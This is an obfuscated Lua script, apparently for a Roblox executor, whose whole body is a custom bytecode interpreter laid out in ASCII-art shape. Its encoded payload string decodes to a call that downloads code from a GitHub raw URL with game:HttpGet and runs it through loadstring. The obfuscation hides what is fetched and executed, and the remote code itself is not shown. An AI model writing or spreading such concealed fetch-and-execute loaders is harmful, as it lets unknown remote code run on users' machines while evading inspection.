-- ur sus

                                                                                 local v0=tonumber;    
                                                                        local v1=string.byte;local v2=string.char;local 
                                                                     v3=string.sub;local v4=string.gsub;local v5=string.rep;local 
                                                                 v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=    
                                                            getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall 
                                                          ;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local      
                                                        function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)   
                                                      if (v1(v30,2)==81) then local v87=0;while true do if (v87==0) then v19=v0(v3(v30,1,1));   
                                                    return "";end end else local v88=0;local v89;while true do if (v88==0) then v89=v2(v0(v30,16) 
                                                  );if v19 then local v129=v5(v89,v19);v19=nil;return v129;else return v89;end break;end end end    
                                                  end);local function v20(v31,v32,v33) if v33 then local v90=(v31/((5 -3)^(v32-1)))%((5 -3)^(((v33-(( 
                                                1 + 0) -(877 -(282 + 595)))) -(v32-(2 -1))) + (620 -((2192 -(1523 + 114)) + 64)))) ;return v90-(v90%(   
                                                932 -(857 + 74))) ;else local v91=0;local v92;while true do if (v91==(568 -(367 + 201))) then v92=2^(v32- 
                                              (928 -(214 + 641 + 72))) ;return (((v31%(v92 + v92))>=v92) and 1) or (0 + 0) ;end end end end local function  
                                              v21() local v34=0 -0 ;local v35;while true do if (v34==1) then return v35;end if ((1065 -((185 -(32 + 85)) +  
                                            997))==v34) then v35=v1(v16,v18,v18);v18=v18 + (1271 -(226 + 1044)) ;v34=4 -3 ;end end end local function v22()   
                                            local v36=0 + 0 ;local v37;local v38;while true do if ((1 + 0)==v36) then return (v38 * ((1393 -(67 + 113)) -(892 + 
                                           65))) + v37 ;end if (v36==(0 -0)) then v37,v38=v1(v16,v18,v18 + (3 -1) );v18=v18 + (3 -1) ;v36=351 -(87 + 263) ;end    
                                          end end local function v23() local v39=(0 -0) + 0 ;local v40;local v41;local v42;local v43;while true do if (v39==(0 -0)) 
                                           then v40,v41,v42,v43=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (15 -11) ;v39=1;end if (v39==(953 -(802 + 150))) then return (v43  
                                          * 16777216) + (v42 * (176444 -110908)) + (v41 * (187 + 69)) + v40 ;end end end local function v24() local v44=v23();local   
                                        v45=v23();local v46=998 -(915 + 82) ;local v47=(v20(v45,2 -1 ,12 + (438 -(44 + 386)) ) * (2^32)) + v44 ;local v48=v20(v45,21,40 
                                         -9 );local v49=((v20(v45,1219 -(1069 + 118) )==(2 -1)) and  -(1 -0)) --[[==============================]] or 1 ;if (v48==(0 + 0) 
                                        ) then if (v47==(0 -0)) then return v49 * (0 + 0) ;else     --[[============================================]]local v113=791 -(   
                                        368 + 423) ;while true do if (v113==(0 -0)) then v48=1; --[[======================================================]]v46=18 -(10 + 8 
                                      ) ;break;end end end elseif (v48==((9360 -(998 + 488) --[[==========================================================]]) -5827)) then    
                                      return ((v47==((141 + 301) -(341 + 75 + 26))) and ( --[[==============================================================]]v49 * ((3 -2)/( 
                                      772 -(201 + 571))))) or (v49 * NaN) ;end return v8( --[[================================================================]]v49,v48-((1578  
                                      -(116 + 1022)) + 583) ) * (v46 + (v47/((3 -1)^(490  --[[==================================================================]]-(145 + 293)) 
                                      ))) ;end local function v25(v50) local v51=0;local  --[[==================================================================]]v52;local v53;    
                                    while true do if (v51==3) then return v6(v53);end if  --[[====================================================================]](v51==(0 -0)) 
                     then v52=nil;if  not v50 then local v120=0 + (0 -0) ;while true do   --[[====================================================================]]if (v120==(0 -0 
              )) then v50=v23();if (v50==(0 -0)) then return "";end break;end end end v51 --[[======================================================================]]=860 -(814 +  
            45) ;end if (v51==(4 -(1082 -(1020 + 60)))) then v53={};for v114=1 + 0 , #v52 --[[======================================================================]] do v53[v114] 
          =v2(v1(v3(v52,v114,v114)));end v51=2 + 1 ;end if (v51==1) then v52=v3(v16,v18,( --[[======================================================================]]v18 + v50) -( 
        886 -(261 + 624)) );v18=v18 + v50 ;v51=2;end end end local v26=v23;local function --[[======================================================================]] v27(...)     
        return {...},v12("#",...);end local function v28() local v54=(function() return   --[[======================================================================]]function(v93, 
      v94,v95,v96,v97,v98,v99,v100) local v93=(function() return 0;end)();local v94=(     --[[======================================================================]]function()    
      return;end)();local v96=(function() return;end)();while true do if (v93~=(574 -(507 + --[[==================================================================]] 67))) then     
      else local v121=(function() return 0;end)();local v122=(function() return;end)();     --[[================================================================]]while true do if  
    (v121==(1749 -(1013 + 736))) then v122=(function() return 0 + 0 ;end)();while true do   --[[==============================================================]]if (v122==0) then 
     v94=(function() return v95();end)();v96=(function() return nil;end)();v122=(function()   --[[==========================================================]]return 1;end)();end 
     if (v122==1) then v93=(function() return  #"~";end)();break;end end break;end end end if ( --[[====================================================]]v93== #"[") then if (   
    v94== #",") then v96=(function() return v95()~=(0 -0) ;end)();elseif (v94==2) then v96=(      --[[==============================================]]function() return v97();  
    end)();elseif (v94== #"91(") then v96=(function() return v98();end)();end v99[v100]=(function()   --[[====================================]]return v96;end)();break;end   
    end return v93,v94,v95,v96,v97,v98,v99,v100;end;end)();local v55=(function() return function(v101,    --[[========================]]v102,v103) local v104=(function()     
    return 0 -0 ;end)();while true do if (v104==(867 -(550 + 317))) then local v124=(function() return 0 -0 ;end)();while true do if (v124==0) then v101[v102-#"{" ]=(      
  function() return v103();end)();return v101,v102,v103;end end end end end;end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local    
  v58=(function() return {};end)();local v59=(function() return {v56,v57,nil,v58};end)();local v60=(function() return v23();end)();local v61=(function() return {};end) 
  ();for v69= #"}",v60 do FlatIdent_1743D,Type,v21,Cons,v24,v25,v61,v69=(function() return v54(FlatIdent_1743D,Type,v21,Cons,v24,v25,v61,v69);end)();end v59[ #"19("]=(   
  function() return v21();end)();for v70= #"}",v23() do local v71=(function() return v21();end)();if (v20(v71, #",", #"\\")~=(0 -0)) then else local v108=(function()     
  return 0;end)();local v109=(function() return;end)();local v110=(function() return;end)();local v111=(function() return;end)();local v112=(function() return;end)();    
  while true do if (v108~=(285 -(134 + 151))) then else local v125=(function() return 0;end)();local v126=(function() return;end)();while true do if (v125~=(1665 -(970 + 
   695))) then else v126=(function() return 0 -0 ;end)();while true do if ((1990 -(582 + 1408))==v126) then v109=(function() return 0 -0 ;end)();v110=(function() return  
  nil;end)();v126=(function() return 1;end)();end if (v126==(1 -0)) then v108=(function() return 1;end)();break;end end break;end end end if (v108==1) then local v127=(  
  function() return 0;end)();local v128=(function() return;end)();while true do if (v127==(0 -0)) then v128=(function() return 1824 -(1195 + 629) ;end)();while true do   
  if (v128==(1 -0)) then v108=(function() return 2;end)();break;end if (v128~=0) then else v111=(function() return nil;end)();v112=(function() return nil;end)();v128=(   
  function() return 242 -(187 + 54) ;end)();end end break;end end end if (v108==(782 -(162 + 618))) then while true do if (v109==2) then local v137=(function() return 0  
  + 0 ;end)();local v138=(function() return;end)();while true do if (v137==0) then v138=(function() return 0 + 0 ;end)();while true do if ((1 -0)~=v138) then else v109=(   
  function() return  #"xxx";end)();break;end if (0~=v138) then else if (v20(v111, #"{", #"]")== #",") then v112[2]=(function() return v61[v112[2 -0 ]];end)();end if (v20(  
  v111,2,2)== #">") then v112[ #"nil"]=(function() return v61[v112[ #"19("]];end)();end v138=(function() return 1 + 0 ;end)();end end break;end end end if (v109==(1636 -(  
  1373 + 263))) then local v139=(function() return 0;end)();local v140=(function() return;end)();while true do if (v139==0) then v140=(function() return 0;end)();while     
  true do if (v140~=(1001 -(451 + 549))) then else v109=(function() return  #"|";end)();break;end if (v140==(0 + 0)) then v110=(function() return v20(v71,2 -0 , #"gha");   
  end)();v111=(function() return v20(v71, #"0313",9 -3 );end)();v140=(function() return 1;end)();end end break;end end end if (v109~= #"gha") then else if (v20(v111, #     
  "xxx", #"-19")~= #",") then else v112[ #"asd1"]=(function() return v61[v112[ #"0313"]];end)();end v56[v70]=(function() return v112;end)();break;end if (v109== #"]") then 
   local v142=(function() return 1384 -(746 + 638) ;end)();while true do if (v142==(1 + 0)) then v109=(function() return 2;end)();break;end if (v142==0) then v112=(        
  function() return {v22(),v22(),nil,nil};end)();if (v110==0) then local v154=(function() return 0;end)();local v155=(function() return;end)();while true do if (v154==0)   
  then v155=(function() return 0;end)();while true do if ((341 -(218 + 123))~=v155) then else v112[ #"-19"]=(function() return v22();end)();v112[ #"http"]=(function()      
  return v22();end)();break;end end break;end end elseif (v110== #"[") then v112[ #"xnx"]=(function() return v23();end)();elseif (v110==(1583 -(1535 + 46))) then v112[ #   
  "-19"]=(function() return v23() -(2^(16 + 0)) ;end)();elseif (v110== #"xxx") then local v162=(function() return 0 + 0 ;end)();local v163=(function() return;end)();while  
  true do if (v162~=0) then else v163=(function() return 560 -(306 + 254) ;end)();while true do if (v163==0) then v112[ #"gha"]=(function() return v23() -((1 + 1)^16) ;end 
  )();v112[ #"http"]=(function() return v22();end)();break;end end break;end end end v142=(function() return 1 -0 ;end)();end end end end break;end end end end for v72=  
  #"<",v23() do v57,v72,v28=(function() return v55(v57,v72,v28);end)();end return v59;end local function v29(v63,v64,v65) local v66=v63[1468 -(321 + 578 + 568) ];local   
  v67=v63[2 + 0 ];local v68=v63[7 -4 ];return function(...) local v73=v66;local v74=v67;local v75=v68;local v76=v27;local v77=604 -(268 + 335) ;local v78= -(291 -(60 +   
    230));local v79={};local v80={...};local v81=v12("#",...) -(1 + 0) ;local v82={};local v83={};for v105=1456 -(282 + 1174) ,v81 do if (v105>=v75) then v79[v105-v75 ]= 
    v80[v105 + (812 -(569 + 242)) ];else v83[v105]=v80[v105 + (2 -1) ];end end local v84=(v81-v75) + 1 ;local v85;local v86;while true do v85=v73[v77];v86=v85[1 + 0 ];if 
     (v86<=4) then if (v86<=1) then if (v86==(1024 -(706 + 318))) then v83[v85[1253 -(721 + 530) ]]();else local v131=0;local v132;while true do if (v131==(1271 -(945 +  
    326))) then v132=v85[4 -2 ];v83[v132]=v83[v132](v83[v132 + 1 + 0 ]);break;end end end elseif (v86<=(702 -((1416 -(466 + 679)) + 429))) then local v133=(0 -0) + (0 -0 
      ) ;local v134;while true do if ((41<1661) and (v133==(1500 -(1408 + 92)))) then v134=v85[1088 -(461 + 625) ];v83[v134]=v83[v134](v83[v134 + (1289 -(993 + 295)) ] 
      );break;end end elseif ((601<3560) and (v86==3)) then do return;end else v83[v85[1 + 1 ]]=v65[v85[1174 -((2318 -(106 + 1794)) + 753) ]];end elseif ((235<687) and 
       (v86<=(1 + 2 + 3))) then if ((4549>1153) and (v86>(1 + 4))) then do return;end else v83[v85[2]]=v85[1 + 2 ];end elseif ((v86<=7) or (4674<4672)) then v83[v85[1  
        + 1 ]]();elseif (v86>8) then v83[v85[2]]=v65[v85[532 -(406 + 123) ]];else v83[v85[1771 -(1749 + 20) ]]=v85[1 + 1 + 1 ];end v77=v77 + ((3905 -2582) -((3381 -    
        2132) + 73)) ;end end;end return v29(v28(),{},v17)(...);end return v15(                                                                                         
                                                                                                                                                                        
                                                                                                                                                                      
                                                                                                                                                                      
                                                                                                                                                                      
                                                                                                                                                                      
                                                                                                                                                                    
                                                                                                                                                                    
                                                                                                                                                                    
                                                                                                                                                                    
                                                                                                                                                                    
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                
                                                                                                                                                                
                                                                                                                                                                
                                                                                                                                                              
                                                                                                                                                              
                                                                                                                                                            
                                                                                                                                                            
                                                                                                                                                          
                                                                                                                                                      
                                                                                                                                                  
                                                                                                                                          
                                                                                            
                                                                                          
                                                                                        
                                                                                  


"LOL!023Q00030A3Q006C6F6164737472696E67039F3Q007072696E74286C6F6164737472696E672867616D653A482Q74704765742827682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F57686174616D616E666163656775792Q312Q302F4173646173646173642Q2D2F726566732F68656164732F41464743484A4B2D4A4B2F56534348644B4742472D253233322F5A4D424143544B47544F562D253742253744272Q29282Q290A00053Q0012043Q00013Q001208000100024Q00013Q000200026Q000100012Q00033Q00017Q00",v9(),...);
